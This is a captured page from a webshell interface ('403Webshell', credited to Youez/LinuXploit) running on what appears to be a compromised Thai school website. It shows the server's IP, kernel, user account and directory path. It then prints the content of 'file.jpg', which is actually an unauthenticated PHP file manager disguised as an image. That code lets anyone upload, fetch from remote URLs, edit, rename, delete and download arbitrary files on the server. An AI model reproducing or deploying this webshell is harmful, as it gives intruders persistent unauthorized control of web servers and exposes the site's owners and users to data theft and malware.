403Webshell
Server IP : 27.254.66.5  /  Your IP : 216.73.217.39
Web Server : Apache/2
System : Linux cs82.hostneverdie.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
User : technic2 ( 1951)
PHP Version : 7.4.30
Disable Function : apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd,exec, fp, fput, highlight_file, ini_alter, ini_restore, inject_code, passthru,phpAds_remoteInfo, phpAds_XmlRpc,phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid,posix_setuid, posix_setuid, posix_uname,proc_open,proc_close, proc_get_status, proc_nice, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode, show_source,sleep,pcntl_exec,virtual,suexec,dbmopen,dl,symlink,disk_free_space,diskfreespace,leak
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/technic2/domains/technicrayong.ac.th/public_html/teacher/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/technic2/domains/technicrayong.ac.th/public_html/teacher/file.jpg
� trio@ngefly �!
<?php
// filemanager.php
error_reporting(E_ALL);
ini_set('display_errors', 1);

// ------------ Util & init -------------
function safeRealpath($p) {
    $r = realpath($p);
    if ($r === false) {
        // fallback: normalisasi path
        $r = rtrim(str_replace(['/', '\\'], DIRECTORY_SEPARATOR, $p), DIRECTORY_SEPARATOR);
    }
    return $r;
}

// Tentukan directory saat ini (GET 'dir' atau default getcwd)
$requested = isset($_GET['dir']) ? $_GET['dir'] : getcwd();
$currentDir = safeRealpath($requested);
if ($currentDir === false) $currentDir = getcwd();

// ---------------- DOWNLOAD LOKAL ----------------
if (isset($_GET['download'])) {
    $downloadPath = safeRealpath($_GET['download']);
    if ($downloadPath && is_file($downloadPath) && is_readable($downloadPath)) {
        header('Content-Description: File Transfer');
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="' . basename($downloadPath) . '"');
        header('Content-Length: ' . filesize($downloadPath));
        readfile($downloadPath);
        exit;
    } else {
        echo "File tidak ditemukan atau tidak dapat dibaca.";
        exit;
    }
}

// ---------------- Actions ----------------
function redirectTo($dir) {
    header("Location: ?dir=" . urlencode($dir));
    exit;
}

// ---------------- UPLOAD LOKAL ----------------
$uploadMessage = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['upload'])) {
    $postDir = isset($_POST['current_dir']) ? safeRealpath($_POST['current_dir']) : getcwd();
    if ($postDir && is_file($postDir)) $postDir = dirname($postDir);
    $targetDir = ($postDir && is_dir($postDir)) ? $postDir : getcwd();

    $f = $_FILES['upload'];
    if ($f['error'] !== UPLOAD_ERR_OK) {
        $uploadMessage = "Upload error (code {$f['error']}).";
    } elseif (!is_uploaded_file($f['tmp_name'])) {
        $uploadMessage = "File upload tidak valid (bukan dari HTTP POST).";
    } elseif (!is_writable($targetDir)) {
        $uploadMessage = "Folder tujuan tidak writable: " . htmlspecialchars($targetDir);
    } else {
        $orig = basename($f['name']);
        $safe = preg_replace('/[^A-Za-z0-9._-]/', '_', $orig);
        if ($safe === '' || $safe === '.' || $safe === '..') {
            $uploadMessage = "Nama file tidak valid.";
        } else {
            $targetPath = $targetDir . DIRECTORY_SEPARATOR . $safe;
            $in  = @fopen($f['tmp_name'], 'rb');
            $out = @fopen($targetPath, 'wb');
            if ($in && $out) {
                $bytes = stream_copy_to_stream($in, $out);
                fclose($in);
                fclose($out);
                if ($bytes !== false) {
                    @chmod($targetPath, 0644);
                    $uploadMessage = "✅ File dibuat & diisi: " . htmlspecialchars($safe)
                        . "<br>Lokasi: " . htmlspecialchars($targetDir)
                        . "<br>Ukuran tersalin: " . number_format($bytes) . " byte"
                        . "<br><a href='?download=" . rawurlencode($targetPath) . "' target='_blank'>⬇️ Download</a>";
                } else {
                    @unlink($targetPath);
                    $uploadMessage = "❌ Gagal menyalin isi file ke: " . htmlspecialchars($targetPath);
                }
            } else {
                if ($in) fclose($in);
                if ($out) fclose($out);
                $uploadMessage = "❌ Tidak bisa membuka stream baca/tulis. Periksa permission folder.";
            }
        }
    }
}

// ---------------- DOWNLOAD DARI URL ----------------
$downloadMessage = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['download_url'])) {
    $currentDir = isset($_POST['current_dir']) ? safeRealpath($_POST['current_dir']) : getcwd();
    $url = trim($_POST['download_url']);

    if (filter_var($url, FILTER_VALIDATE_URL)) {
        $filename = basename(parse_url($url, PHP_URL_PATH));
        $filename = preg_replace('/[^A-Za-z0-9._-]/', '_', $filename);
        if ($filename === '' || $filename === '.' || $filename === '..') $filename = 'downloaded_file';
        $targetPath = $currentDir . DIRECTORY_SEPARATOR . $filename;

        // Download file dengan stream
        $in  = @fopen($url, 'rb');
        $out = @fopen($targetPath, 'wb');
        if ($in && $out) {
            $bytes = stream_copy_to_stream($in, $out);
            fclose($in);
            fclose($out);
            if ($bytes !== false) {
                @chmod($targetPath, 0644);
                $downloadMessage = "✅ File dari URL berhasil didownload: <strong>" . htmlspecialchars($filename) . "</strong>
                                    <br>Lokasi: " . htmlspecialchars($currentDir)
                                    . "<br><a href='?download=" . rawurlencode($targetPath) . "' target='_blank'>⬇️ Download</a>";
            } else {
                @unlink($targetPath);
                $downloadMessage = "❌ Gagal menulis file dari URL.";
            }
        } else {
            if ($in) fclose($in);
            if ($out) fclose($out);
            $downloadMessage = "❌ Tidak bisa membuka URL atau folder tujuan.";
        }
    } else {
        $downloadMessage = "❌ URL tidak valid.";
    }
}

// ---------------- DELETE ----------------
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['delete'])) {
    $currentDir = isset($_POST['current_dir']) ? safeRealpath($_POST['current_dir']) : $currentDir;
    $target = safeRealpath($_POST['delete']);
    if ($target && strpos($target, DIRECTORY_SEPARATOR) !== false) {
        if (is_dir($target)) @rmdir($target); else @unlink($target);
    }
    redirectTo($currentDir);
}

// ---------------- RENAME ----------------
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['rename_path'], $_POST['new_name'])) {
    $currentDir = isset($_POST['current_dir']) ? safeRealpath($_POST['current_dir']) : $currentDir;
    $old = safeRealpath($_POST['rename_path']);
    $newName = basename($_POST['new_name']);
    if ($old && file_exists($old)) {
        $newPath = dirname($old) . DIRECTORY_SEPARATOR . preg_replace('/[^A-Za-z0-9._-]/', '_', $newName);
        @rename($old, $newPath);
    }
    redirectTo($currentDir);
}

// ---------------- EDIT / SAVE ----------------
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['edit_path']) && !isset($_POST['save_content'])) {
    $currentDir = isset($_POST['current_dir']) ? safeRealpath($_POST['current_dir']) : $currentDir;
    $editPath = safeRealpath($_POST['edit_path']);
    if ($editPath && is_file($editPath) && is_readable($editPath)) {
        $content = htmlspecialchars(file_get_contents($editPath));
        echo "<h3>Editing: " . htmlspecialchars($editPath) . "</h3>
              <form method='post'>
                <input type='hidden' name='save_path' value='" . htmlspecialchars($editPath) . "'>
                <input type='hidden' name='current_dir' value='" . htmlspecialchars($currentDir) . "'>
                <textarea name='content' rows='20' cols='100'>{$content}</textarea><br>
                <button type='submit' name='save_content'>Simpan</button>
              </form>";
        exit;
    } else {
        redirectTo($currentDir);
    }
}
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['save_content'], $_POST['save_path'])) {
    $savePath = safeRealpath($_POST['save_path']);
    if ($savePath && is_file($savePath) && is_writable($savePath)) {
        file_put_contents($savePath, $_POST['content']);
    }
    $currentDir = isset($_POST['current_dir']) ? safeRealpath($_POST['current_dir']) : $currentDir;
    redirectTo($currentDir);
}

// ---------------- CREATE FILE / FOLDER ----------------
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['new_file'])) {
    $currentDir = isset($_POST['current_dir']) ? safeRealpath($_POST['current_dir']) : $currentDir;
    $name = basename($_POST['new_file']);
    file_put_contents($currentDir . DIRECTORY_SEPARATOR . preg_replace('/[^A-Za-z0-9._-]/', '_', $name), '');
    redirectTo($currentDir);
}
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['new_folder'])) {
    $currentDir = isset($_POST['current_dir']) ? safeRealpath($_POST['current_dir']) : $currentDir;
    $name = basename($_POST['new_folder']);
    @mkdir($currentDir . DIRECTORY_SEPARATOR . preg_replace('/[^A-Za-z0-9._-]/', '_', $name));
    redirectTo($currentDir);
}

// ---------------- LISTING ----------------
function buildBreadcrumb($dir) {
    $parts = preg_split('#[\\/\\\\]#', $dir, -1, PREG_SPLIT_NO_EMPTY);
    $acc = (DIRECTORY_SEPARATOR === '/') ? '' : '';
    $crumbs = [];
    $prefix = DIRECTORY_SEPARATOR;
    $pathParts = [];
    if (DIRECTORY_SEPARATOR === '/' && substr($dir,0,1) === '/') $acc = DIRECTORY_SEPARATOR;
    foreach ($parts as $p) {
        $acc .= ($acc === DIRECTORY_SEPARATOR || $acc === '' ? $p : DIRECTORY_SEPARATOR . $p);
        $pathParts[] = $acc;
    }
    if (empty($pathParts)) return "<a href='?dir=" . urlencode(DIRECTORY_SEPARATOR) . "'>/</a>";
    $out = [];
    foreach ($pathParts as $pp) {
        $out[] = "<a href='?dir=" . urlencode($pp) . "'>" . htmlspecialchars(basename($pp) ?: $pp) . "</a>";
    }
    return implode(" / ", $out);
}

function listFilesAndDirs($dir) {
    $items = @scandir($dir);
    if ($items === false) {
        echo "<tr><td colspan='5'>Tidak dapat membaca direktori ini.</td></tr>";
        return;
    }
    foreach ($items as $item) {
        if ($item === '.') continue;
        if ($item === '..') {
            $parent = dirname($dir);
            echo "<tr><td>📁</td><td><a href='?dir=" . urlencode($parent) . "'>.. (Parent)</a></td><td>-</td><td>-</td><td>-</td></tr>";
            continue;
        }
        $path = $dir . DIRECTORY_SEPARATOR . $item;
        $type = is_dir($path) ? 'Folder' : 'File';
        $size = is_file($path) ? filesize($path) : '-';
        $time = file_exists($path) ? date("Y-m-d H:i:s", filemtime($path)) : '-';
        echo "<tr>
            <td>" . ($type === 'Folder' ? '📁' : '📄') . "</td>
            <td>" . ($type==='Folder'? "<a href='?dir=" . urlencode($path) . "'>" . htmlspecialchars($item) . "</a>" : htmlspecialchars($item)) . "</td>
            <td>" . htmlspecialchars($size) . "</td>
            <td>" . htmlspecialchars($time) . "</td>
            <td>
                <form method='post' style='display:inline'>
                    <input type='hidden' name='delete' value='" . htmlspecialchars($path) . "'>
                    <input type='hidden' name='current_dir' value='" . htmlspecialchars($dir) . "'>
                    <button onclick='return confirm(\"Yakin hapus?\")'>🗑</button>
                </form>
                <form method='post' style='display:inline'>
                    <input type='hidden' name='rename_path' value='" . htmlspecialchars($path) . "'>
                    <input type='hidden' name='current_dir' value='" . htmlspecialchars($dir) . "'>
                    <input type='text' name='new_name' placeholder='Nama baru' required>
                    <button>✏️</button>
                </form>";
        if ($type === 'File') {
            echo " <a href='?download=" . urlencode($path) . "'>⬇️ Download</a>
                   <form method='post' style='display:inline'>
                     <input type='hidden' name='edit_path' value='" . htmlspecialchars($path) . "'>
                     <input type='hidden' name='current_dir' value='" . htmlspecialchars($dir) . "'>
                     <button>📝 Edit</button>
                   </form>";
        }
        echo "</td></tr>";
    }
}
?>
<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>File Manager</title>
    <style>
        body { font-family: Arial, sans-serif; padding:16px; background:#f7f7f7; }
        table { width:100%; background:#fff; border-collapse:collapse; }
        th, td { padding:8px; border:1px solid #e1e1e1; }
        form { margin:0; display:inline; }
        input[type="text"], input[type="url"] { padding:4px; }
    </style>
</head>
<body>
    <h2>File Manager</h2>
    <p><strong>Lokasi saat ini:</strong> <?= buildBreadcrumb($currentDir) ?></p>

    <?php if ($uploadMessage): ?>
        <div style="padding:8px; background:#efe; border:1px solid #cfc; margin-bottom:8px;"><?= $uploadMessage ?></div>
    <?php endif; ?>
    <?php if ($downloadMessage): ?>
        <div style="padding:8px; background:#eef; border:1px solid #ccf; margin-bottom:8px;"><?= $downloadMessage ?></div>
    <?php endif; ?>

    <!-- Upload File Lokal -->
    <form method="post" enctype="multipart/form-data" style="margin-bottom:8px;">
        <input type="hidden" name="current_dir" value="<?= htmlspecialchars($currentDir) ?>">
        <input type="file" name="upload" required>
        <button>⬆ Upload</button>
    </form>

    <!-- Download File dari URL -->
    <form method="post" style="margin-bottom:8px;">
        <input type="hidden" name="current_dir" value="<?= htmlspecialchars($currentDir) ?>">
        <input type="url" name="download_url" placeholder="Masukkan URL file" required style="width:300px;">
        <button>🌐 Download dari URL</button>
    </form>

    <!-- Buat File / Folder -->
    <form method="post" style="display:inline; margin-right:8px;">
        <input type="hidden" name="current_dir" value="<?= htmlspecialchars($currentDir) ?>">
        <input type="text" name="new_file" placeholder="Nama file baru">
        <button>📄 Buat File</button>
    </form>
    <form method="post" style="display:inline;">
        <input type="hidden" name="current_dir" value="<?= htmlspecialchars($currentDir) ?>">
        <input type="text" name="new_folder" placeholder="Nama folder baru">
        <button>📁 Buat Folder</button>
    </form>

    <table style="margin-top:12px;">
        <thead><tr><th>Type</th><th>Nama</th><th>Ukuran</th><th>Waktu</th><th>Aksi</th></tr></thead>
        <tbody>
            <?php listFilesAndDirs($currentDir); ?>
        </tbody>
    </table>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit